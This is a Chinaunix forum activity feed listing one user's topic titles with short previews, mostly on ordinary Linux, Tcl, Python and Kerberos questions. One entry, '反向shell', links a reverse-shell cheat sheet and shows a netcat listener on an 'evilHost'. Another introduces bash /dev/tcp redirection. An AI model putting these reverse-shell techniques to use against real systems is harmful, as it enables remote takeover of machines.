免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库

动态

2016-05-26

  • yjh777 发表了新话题 2016-05-26 12:20
    [share] Cygwin和MinGW的区别与联系
    【转自】https://www.zhihu.com/question/22137175 Cygwin和MinGW的区别与联系 Cygwin,原 Cygnus 出品(已被红帽收购),目前是 RedHat 名下的项目。项目 ...

2016-05-19

2016-05-05

2016-04-28

2016-04-21

2016-04-19

  • yjh777 发表了新话题 2016-04-19 16:03
    firexfox 插件中 tabs.open() 问题
    如题: 使用一个 firefox 插件,里面有个功能是右键打开一个新标签页,但是这个新标签页的位置排在最有标签的最后。 请问怎么才能使 新的标签页在 点击页面 ...

2016-04-15

2016-04-12

2016-04-07

  • yjh777 发表了新话题 2016-04-07 20:54
    静态工厂方法
    看 Effective Java 没看懂,看了这篇文章终于懂了 http://ifeve.com/static-factory-methods-vs-traditional-constructors/ 不就是在方法里面调用构造函 ...
  • yjh777 发表了新话题 2016-04-07 15:24
    [请教] 有人有配置 krb5 的经验吗?
    如题: server 2012 环境,要搭建nfs server,配置 krb5.ini 网上说修改 C:\winnt\krb5.ini ,可是发现没有这个文件 是需要自己手工创建吗?

2016-04-06

  • yjh777 发表了新话题 2016-04-06 17:45
    ansi2html.sh
    http://www.pixelbeat.org/scripts/ansi2html.sh
  • yjh777 发表了新话题 2016-04-06 16:33
    Kerberos 和 IPA 什么关系?
    如题,我们目前直接装 Kerberos-server, kadmin 添加需要的 princ, 然后客户问我们用的是 AD 还是 IPA ? IPA 跟 Kerberos 什么关系?

2016-03-31

2016-03-30

2016-03-29

  • yjh777 发表了新话题 2016-03-29 11:46
    google spreadsheet 开源替代品
    ethercalc: http://cn.ethercalc.net/ 即时协作电子表格 您可在网页上建立电子表格,让许多人同时编辑。 每次更动都会随时反映在所有人的屏幕上。 开 ...
  • yjh777 发表了新话题 2016-03-29 11:38
    python-google-spreadsheet
    本来想找API在程序里写数据到google docs,发现竟然有现成的包了: https://pypi.python.org/pypi/python-google-spreadsheet

2016-03-28

2016-03-25

  • yjh777 发表了新话题 2016-03-25 16:51
    自动批量安装windows有什么工具?
    http://fai-project.org/fai-guide/ FAI Guide (Fully Automatic Installation) 看到这个工具可以自动安装 linux 请问全自动安装windows通常用什么工 ...
  • yjh777 发表了新话题 2016-03-25 16:22
    FAI Guide (Fully Automatic Installation)
    http://fai-project.org FAI is a non-interactive system to install, customize and manage Linux systems and software configurations on computers as ...
  • yjh777 发表了新话题 2016-03-25 10:31
    找到一个很棒的django文档
    http://djangobook.py3k.cn/2.0/ http://djangobook.py3k.cn/2.0/chapter04/ 好的文档真的很重要啊,马上就看进去,不在纠结选哪个框架了
  • yjh777 发表了新话题 2016-03-25 07:14
    ORM 是干啥的?
    如题,看介绍web框架的文章,说有的有 ORM 有的没有,这玩意儿做什么用? 只做个简单的数据库操作的网页需要ORM吗?

2016-03-24

2016-03-23

2016-03-22

  • yjh777 发表了新话题 2016-03-22 17:07
    [share] xchat tcl 插件
    yum install -y xchat-tcl restart xchat2 /source /some/patch/xxx.tcl Doc: http://www.scriptkitties.com/tclplugin/reference

2016-03-18

2016-03-16

  • yjh777 发表了新话题 2016-03-16 18:03
    shell 里面解析xml的方法
    xmllint --xpath "string($xmlPath)" k.xml #common usage: xmllint --xpath '//element/@attribute' filename.xml xmlstarlet sel -T -t -m '//eleme ...

2016-03-15

  • yjh777 发表了新话题 2016-03-15 10:37
    [slackware] slackware死了吗?
    没有,它只是发布节奏很慢: 想知道最新动态,看changelog: ftp://ftp.osuosl.org/pub/slackware/slackware64-current/ChangeLog.txt 安装current版本 ...

2016-03-14

2016-03-10

2016-03-09

2016-03-08

2016-03-03

2016-02-26

  • yjh777 发表了新话题 2016-02-26 15:08
    谈 Linux,Windows 和 Mac -- 王垠
    转载: http://www.yinwang.org/blog-cn/2013/03/07/linux-windows-mac 这段时间受到很多人的来信。他们看了我很早以前写的推崇 Linux 的文章,想知道如何“ ...
  • yjh777 发表了新话题 2016-02-26 15:05
    学习Linux的几点忠告
    学习Linux的几点忠告 by 王垠 1. 不要当“传教士” 很多人在讨论区不断的引起 "Linux vs. Windows" 之类的讨论,甚至争的面红耳赤,这是没有必要的。这 ...
  • yjh777 发表了新话题 2016-02-26 14:49
    [tcl] sqlite db eval locked fail 解决方法
    操作一个sqlite db,有读进程 有写进程,时常会出现 db eval {sql} 时出先数据库已加锁的问题 如果,显式的做错误处理,代码太复杂了。搜索官方文档终于找到答案 ...

2016-02-25

2016-02-24

2016-02-22

2016-02-19

2016-02-18

2016-02-17

2016-02-15

  • yjh777 发表了新话题 2016-02-15 16:34
    [jimtcl] Introduction
    Introduction Jim is an opensource small-footprint implementation of the Tcl programming language. It implements a large subset of Tcl and adds new ...

2016-02-14

2016-02-06

  • yjh777 发表了新话题 2016-02-06 10:58
    [大家新年好]
    祝大家 新年 身体健康,心想事成,一切顺利! 祝文艺青年们:永远年轻,永远热泪盈眶!

2016-02-04

  • yjh777 发表了新话题 2016-02-04 01:33
    [tdom]
    只搜当前节点的子节点,一直以为是个bug: 用子节点对象 selectNodes 搜到的结果,还是整个文档所有的结果。 今天仔细看文档才发现不是bug,只搜子节点的话 ...

2016-02-03

2016-01-27

2016-01-21

  • yjh777 发表了新话题 2016-01-21 14:54
    $(cat file) -> $(< file)
    一直都有的一个特性,今天才发现: Bash performs the expansion by executing command and replacing the command substitution with the standard output of ...
  • yjh777 发表了新话题 2016-01-21 14:07
    typedef opaque attrlist4<>; 是什么意思?
    如题,看到一些 RFC 里面有这样的描述 /// /* /// * Basic data types /// */ /// typedef opaque attrlist4; /// typedef uint3 ...
  • yjh777 发表了新话题 2016-01-21 13:57
    [trap] 怎么将trap继承到子进程?
    如题,trap了 Ctrl+c 后,本来是想忽略 Ctrl+c , 但是发现前台进程确实生效了,但是发现第一个while还是回被Ctrl+c杀死 请教高手怎么破??

2016-01-20

  • yjh777 发表了新话题 2016-01-20 13:31
    警钟长鸣: 又载在 \r 手里了
    处理irc消息,从中截取一个简单的版本号 然后再去一个文本数据库查找, 发现总是匹配不到结果,拷贝出来,grep 就没有问题, 定位了半个来小时,发现版本号 ...

2016-01-18

2016-01-16

2016-01-15

  • yjh777 发表了新话题 2016-01-15 09:37
    [bash] bash 管道的三种形式
    cmd1 | [/backcolor]cmd2 #cmd1 写管道 cmd2 读; cmd2是进程组首进程,$? 是 cmd2 的返回值 (如果没有 set -o pipefail) cmd1 > >(cmd2)[/backcolor] ...

2016-01-13

  • yjh777 发表了新话题 2016-01-13 19:48
    反向shell
    http :// pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet evilHost: nc -l -p $port ----------------------------------------- ...
  • yjh777 发表了新话题 2016-01-13 18:42
    set -o verbose 怎么增加 prompt ?
    我们知道 set -o xtrace (set -x) 有 PS4 做提示符, 但是 set -o verbose 时,输出里面没有 prompt ,这样命令行 和 命令输出混在一起,辨识度很差 有什么办 ...
  • yjh777 发表了新话题 2016-01-13 17:49
    bash 竟然可以这样玩 /dev/tcp
    If bash was compiled with --enable-net-redirections, it has the capability of using a special character device for both TCP and UDP redirections. The ...
  • yjh777 发表了新话题 2016-01-13 16:40
    谁来介绍一下 perl6 2015年进展?
    如题,中文资料太少了 有没有在用或一直关注perl6的同学,给介绍一下 perl6 2015 年终总结? 做到什么程度了? 有没有一些基于perl6的项 ...
  • yjh777 发表了新话题 2016-01-13 16:20
    Python Cookbook 3rd 中文电子版
    Python Cookbook 3rd 中文电子版 http://python3-cookbook.readthedocs.org/zh_CN/latest/index.html http://pan.baidu.com/s/1bok0W6j

2015-12-29

2015-12-26

2015-12-23

2015-11-27

2015-11-16

  • yjh777 发表了新话题 2015-11-16 14:21
    [报bug] 关键字过滤问题
    如果写下面这句话,就提示内容有问题儿不让提交 > 将重复 的有规律的事情 jiao 给机 器/电 脑来完成,, 但是提交两个字里面也有交,就可以通过;交 给 ...

2015-11-12

2015-11-11

2015-11-09